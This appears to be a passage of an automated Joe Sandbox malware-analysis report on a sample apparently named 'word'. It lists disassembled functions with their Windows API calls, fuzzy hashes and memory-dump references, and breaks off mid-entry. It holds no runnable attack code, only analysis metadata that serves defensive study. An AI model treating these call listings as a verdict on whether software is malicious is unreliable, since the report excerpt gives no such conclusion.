                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Enable$Show$FocusMessageSend
                                                                            • String ID:
                                                                            • API String ID: 3429747543-0
                                                                            • Opcode ID: f5aca3f6d68f8169105ace43209457086b036621b25274999c7621d4cb9b91fc
                                                                            • Instruction ID: 96ed947056310062a3fa6d2350adc65d304252fdbf70c479ab88671ed4e09c2c
                                                                            • Opcode Fuzzy Hash: f5aca3f6d68f8169105ace43209457086b036621b25274999c7621d4cb9b91fc
                                                                            • Instruction Fuzzy Hash: FC31B4706443819BF7248E14C8C4BAFB7D0EB95745F04492EF981A6291DBA89845C719
                                                                            Function 0044796B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 96COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetClientRect.USER32(?,?,004A83D8,?), ref: 00447997
                                                                            • GetCursorPos.USER32(?), ref: 004479A2
                                                                            • ScreenToClient.USER32(?,?), ref: 004479BE
                                                                            • WindowFromPoint.USER32 ref: 004479FF
                                                                            • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447A78
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Client$CursorFromPointProcRectScreenWindow
                                                                            • String ID: X+
                                                                            • API String ID: 1822080540-1938338529
                                                                            • Opcode ID: c356f0f93048ebf3c0a873f2be17aa192b5fb9472fb724aa4a6a449873fe30ba
                                                                            • Instruction ID: e9c1e18ea4fcc9a2ad4b32cd349e8b57ec7287094a91df3c43d19f1875151664
                                                                            • Opcode Fuzzy Hash: c356f0f93048ebf3c0a873f2be17aa192b5fb9472fb724aa4a6a449873fe30ba
                                                                            • Instruction Fuzzy Hash: DE3188742082029BD710CF19D88596FB7A9EBC8714F144A1EF88097291D778EA57CBAA
                                                                            Function 00447870 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 94windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCursorPos.USER32(?), ref: 004478A7
                                                                            • TrackPopupMenuEx.USER32 ref: 004478C3
                                                                            • DefDlgProcW.USER32(?,0000007B,?,?,004A83D8,?,004A83D8,?), ref: 004478E7
                                                                            • GetCursorPos.USER32(?), ref: 00447935
                                                                            • TrackPopupMenuEx.USER32 ref: 0044795B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CursorMenuPopupTrack$Proc
                                                                            • String ID: X+
                                                                            • API String ID: 1300944170-1938338529
                                                                            • Opcode ID: 00aabaf84d80e4f8c92fc7d2a6c816b999107077810d41e1d32a7af9c3da8c6b
                                                                            • Instruction ID: 600148c7f6f0e64f7aba5c2d0a58757112576a5c49d56a392ea253be37485a5b
                                                                            • Opcode Fuzzy Hash: 00aabaf84d80e4f8c92fc7d2a6c816b999107077810d41e1d32a7af9c3da8c6b
                                                                            • Instruction Fuzzy Hash: 2B31E475244204ABE214DB48DC48FABB7A5FBC9711F14491EF64483390D7B96C4BC779
                                                                            Function 0045D321 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 81COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D32F
                                                                            • GetVolumeInformationW.KERNEL32 ref: 0045D3B3
                                                                            • __swprintf.LIBCMT ref: 0045D3CC
                                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D416
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$InformationVolume__swprintf
                                                                            • String ID: %lu$HH
                                                                            • API String ID: 3164766367-3924996404
                                                                            • Opcode ID: bd20e614eacc1ec6e7ce8a240dc663141bf9142d6fc10aee8c7bf862d4d2af0b
                                                                            • Instruction ID: e4de0c6df68350460ad5232616e5185c9d799459bd1b640414cfcbd8d86849a8
                                                                            • Opcode Fuzzy Hash: bd20e614eacc1ec6e7ce8a240dc663141bf9142d6fc10aee8c7bf862d4d2af0b
                                                                            • Instruction Fuzzy Hash: 85314A716083019BC310EF55D941A5BB7E4FF88704F40892EFA4597292D774EA09CB9A
                                                                            Function 00450DB4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 76windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450E24
                                                                            • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450E35
                                                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450E43
                                                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450E54
                                                                            • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450E62
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: Msctls_Progress32
                                                                            • API String ID: 3850602802-3636473452
                                                                            • Opcode ID: 42656bfbb5a190feb894f1e63281698c22ff60bbec02a0e57f9bf8616b6fd2a5
                                                                            • Instruction ID: b51c377fab27852337593a8f268aff884918310fa347e0537580fa9f3b853d23
                                                                            • Opcode Fuzzy Hash: 42656bfbb5a190feb894f1e63281698c22ff60bbec02a0e57f9bf8616b6fd2a5
                                                                            • Instruction Fuzzy Hash: 2C2121712543007AE7209A65DC42F5BB3E9AFD8B24F214A0EF754B72D1C6B4F8418B58
                                                                            Function 00455449 Relevance: 10.6, APIs: 7, Instructions: 75windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                                                            • String ID:
                                                                            • API String ID: 3985565216-0
                                                                            • Opcode ID: dc022e11ae60a508d3fee16e2099accab07c71a042b18f60c16d9d094d7ead98
                                                                            • Instruction ID: 02eb1b45cc7e926b76574f27881fb1e8d9d372094f4d7b34cf8607babd6cb63d
                                                                            • Opcode Fuzzy Hash: dc022e11ae60a508d3fee16e2099accab07c71a042b18f60c16d9d094d7ead98
                                                                            • Instruction Fuzzy Hash: EA213270200A019FCB20DF65CAD4B2A77A9BF45312F50855EED45CB352DB39EC45CB69
                                                                            Function 00415702 Relevance: 10.6, APIs: 7, Instructions: 74threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ___set_flsgetvalue.LIBCMT ref: 00415737
                                                                            • __calloc_crt.LIBCMT ref: 00415743
                                                                            • __getptd.LIBCMT ref: 00415750
                                                                            • CreateThread.KERNEL32(00000000,?,0041568B,00000000,00000004,00000000), ref: 00415776
                                                                            • ResumeThread.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00415786
                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 00415791
                                                                            • __dosmaperr.LIBCMT ref: 004157A9
                                                                              • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                              • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
                                                                            • String ID:
                                                                            • API String ID: 1269668773-0
                                                                            • Opcode ID: 67dce5b71fba5b2bc579f619b30886b4133a6035229b30961222ec1983ea5d94
                                                                            • Instruction ID: 083f1b3d72dc2b4e3073d7627409da2efaae6cca9fbdfa2eb2c15b7cb2a145f7
                                                                            • Opcode Fuzzy Hash: 67dce5b71fba5b2bc579f619b30886b4133a6035229b30961222ec1983ea5d94
                                                                            • Instruction Fuzzy Hash: 4511E672501604EFC720AF76DC868DF7BA4EF80334F21412FF525922D1DB788981966D
                                                                            Function 00439102 Relevance: 10.5, APIs: 7, Instructions: 46threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00438FE4: GetProcessHeap.KERNEL32(00000008,0000000C,0043910A,00000000,00000000,00000000,0044646E,?,?,?), ref: 00438FE8
                                                                              • Part of subcall function 00438FE4: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FEF
                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,0044646E,?,?,?), ref: 00439119
                                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439123
                                                                            • DuplicateHandle.KERNEL32 ref: 0043912C
                                                                            • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00439138
                                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439142
                                                                            • DuplicateHandle.KERNEL32 ref: 00439145
                                                                            • CreateThread.KERNEL32(00000000,00000000,004390C2,00000000,00000000,00000000), ref: 0043915E
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                            • String ID:
                                                                            • API String ID: 1957940570-0
                                                                            • Opcode ID: ae016cd78919e3da0d3d218cc031d8d4f693afb8d34ff927aa47fd3b6f506194
                                                                            • Instruction ID: b388a4287fabc35bf2088fa38ebc9459a42e34e8a642192e1b63b89709cb9be3
                                                                            • Opcode Fuzzy Hash: ae016cd78919e3da0d3d218cc031d8d4f693afb8d34ff927aa47fd3b6f506194
                                                                            • Instruction Fuzzy Hash: 3BF0CD753413007BD220EB65DC86F5BB7A8EBC9B10F118919F6049B1D1C6B4A800CB65
                                                                            Function 0041568B Relevance: 10.5, APIs: 7, Instructions: 37threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ___set_flsgetvalue.LIBCMT ref: 00415690
                                                                              • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                              • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                              • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                            • ___fls_getvalue@4.LIBCMT ref: 0041569B
                                                                              • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                            • ___fls_setvalue@8.LIBCMT ref: 004156AD
                                                                              • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 004156B6
                                                                            • ExitThread.KERNEL32 ref: 004156BD
                                                                            • __freefls@4.LIBCMT ref: 004156D9
                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 004156EC
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                            • String ID:
                                                                            • API String ID: 4166825349-0
                                                                            • Opcode ID: 185d0aae8fe32bab84a079219336c355dd614541d1aff55515eff8c05f91681e
                                                                            • Instruction ID: 1015f584654e325efa3cacb901eba7c9ae2b5aefa54885f90b4e6d99173acdac
                                                                            • Opcode Fuzzy Hash: 185d0aae8fe32bab84a079219336c355dd614541d1aff55515eff8c05f91681e
                                                                            • Instruction Fuzzy Hash: 14F049745007009BD704BF72DD159DE7B69AF85345761C85FB80897222DA3DC9C1CB9C
                                                                            Function 00434124 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 15libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00434134
                                                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00434146
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: RegDeleteKeyExW$advapi32.dll$p#D$p#D
                                                                            • API String ID: 2574300362-3261711971
                                                                            • Opcode ID: 3da92f374f37a9fa7395fa6ef73d3af1d379715eec5b41da1672ebd70bf57acc
                                                                            • Instruction ID: cb82693085896f9455b4638215a98dd7e3cb824177552166877179ce6000b7c2
                                                                            • Opcode Fuzzy Hash: 3da92f374f37a9fa7395fa6ef73d3af1d379715eec5b41da1672ebd70bf57acc
                                                                            • Instruction Fuzzy Hash: D8D05EB0400B039FCB105F24D8086AB76F4EB68700F208C2EF989A3750C7B8E8C0CB68
                                                                            Function 004336C7 Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetClientRect.USER32(?,?,00000000,FFFFFFFF,00000000,?), ref: 00433724
                                                                            • GetWindowRect.USER32(00000000,?), ref: 00433757
                                                                            • GetClientRect.USER32(0000001D,?,00000000,FFFFFFFF,00000000,?), ref: 004337AC
                                                                            • GetSystemMetrics.USER32(0000000F), ref: 00433800
                                                                            • GetWindowRect.USER32(?,?), ref: 00433814
                                                                            • ScreenToClient.USER32(?,?), ref: 00433842
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                            • String ID:
                                                                            • API String ID: 3220332590-0
                                                                            • Opcode ID: 3d0204db3781b081fd3de6a8efec2d06c6e501bf89adf1cf9fb69463b8de8f3e
                                                                            • Instruction ID: 40e56d112be44df416332e5c874318f33691c6b0c201ea6c9f9086adb5117cf0
                                                                            • Opcode Fuzzy Hash: 3d0204db3781b081fd3de6a8efec2d06c6e501bf89adf1cf9fb69463b8de8f3e
                                                                            • Instruction Fuzzy Hash: E9A126B42147028AC324CF68C5847ABBBF1FF98715F04991EE9D983360E775E908CB5A
                                                                            Function 00457838 Relevance: 9.2, APIs: 6, Instructions: 176COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: _malloc_wcslen$_strcat_wcscpy
                                                                            • String ID:
                                                                            • API String ID: 1612042205-0
                                                                            • Opcode ID: de2929fcda50375e6e5cb9f1075b8832783a078aa1feca3c1cc6154b42d84a61
                                                                            • Instruction ID: 39b6431fb86a1cae222df6ecce28f21653e085caad8de22f1e35678e4483a9b6
                                                                            • Opcode Fuzzy Hash: de2929fcda50375e6e5cb9f1075b8832783a078aa1feca3c1cc6154b42d84a61
                                                                            • Instruction Fuzzy Hash: CD613B70504202EFCB10EF29D58096AB3E5FF48305B50496EF8859B306D738EE59DB9A
                                                                            Function 0044C522 Relevance: 9.2, APIs: 6, Instructions: 155windowkeyboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost$KeyboardState$InputSend
                                                                            • String ID:
                                                                            • API String ID: 2221674350-0
                                                                            • Opcode ID: 061e63fcf1402e721e52ee56d2f22f81c2cbe03cfd8f861d8ff00d299370d474
                                                                            • Instruction ID: 3a634557d1668dba9f4fbb3ffee1259adddcddb7f3fce46f2ce6721246940f3b
                                                                            • Opcode Fuzzy Hash: 061e63fcf1402e721e52ee56d2f22f81c2cbe03cfd8f861d8ff00d299370d474
                                                                            • Instruction Fuzzy Hash: A24148725053486AF760EF209C80BFFBB98EF95324F04151FFDC412281D66E984987BA
                                                                            Function 00445153 Relevance: 9.1, APIs: 6, Instructions: 142COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscpy$_wcscat
                                                                            • String ID:
                                                                            • API String ID: 2037614760-0
                                                                            • Opcode ID: f99e136c889cacb8689bc9f00eee4ad51686cf745bff212a4790763dd87d00cb
                                                                            • Instruction ID: 871aa96d6b0d5f43eceffdadd72b032f7becd6ba50fbda5e2bca5dd503650597
                                                                            • Opcode Fuzzy Hash: f99e136c889cacb8689bc9f00eee4ad51686cf745bff212a4790763dd87d00cb
                                                                            • Instruction Fuzzy Hash: 7D41BD31901A256BDE317F55D880BBB7358DFA1314F84006FF98247313EA6E5892C6BE
                                                                            Function 00447B66 Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • BeginPaint.USER32(00000000,?), ref: 00447B9D
                                                                            • GetWindowRect.USER32(?,?), ref: 00447C1B
                                                                            • ScreenToClient.USER32(?,?), ref: 00447C39
                                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
                                                                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
                                                                            • EndPaint.USER32(?,?), ref: 00447CD1
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                            • String ID:
                                                                            • API String ID: 4189319755-0
                                                                            • Opcode ID: 37bca05dc5f282a43c1c57c3b808f61ec058395b4d713bcb6da44fc2610780a1
                                                                            • Instruction ID: de699fe3e67e71f806f86ee7feca1bcffcb0489daa19151882f3061068cc4b26
                                                                            • Opcode Fuzzy Hash: 37bca05dc5f282a43c1c57c3b808f61ec058395b4d713bcb6da44fc2610780a1
                                                                            • Instruction Fuzzy Hash: D14182705043019FE320DF15C8C8F7B7BA8EB89724F04466EF9548B391DB74A846CB69
                                                                            Function 0044B474 Relevance: 9.1, APIs: 6, Instructions: 113fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B490
                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                            • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4C2
                                                                            • EnterCriticalSection.KERNEL32(00000000), ref: 0044B4E3
                                                                            • LeaveCriticalSection.KERNEL32(00000000), ref: 0044B5A0
                                                                            • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B5BB
                                                                              • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                              • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                              • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5D1
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
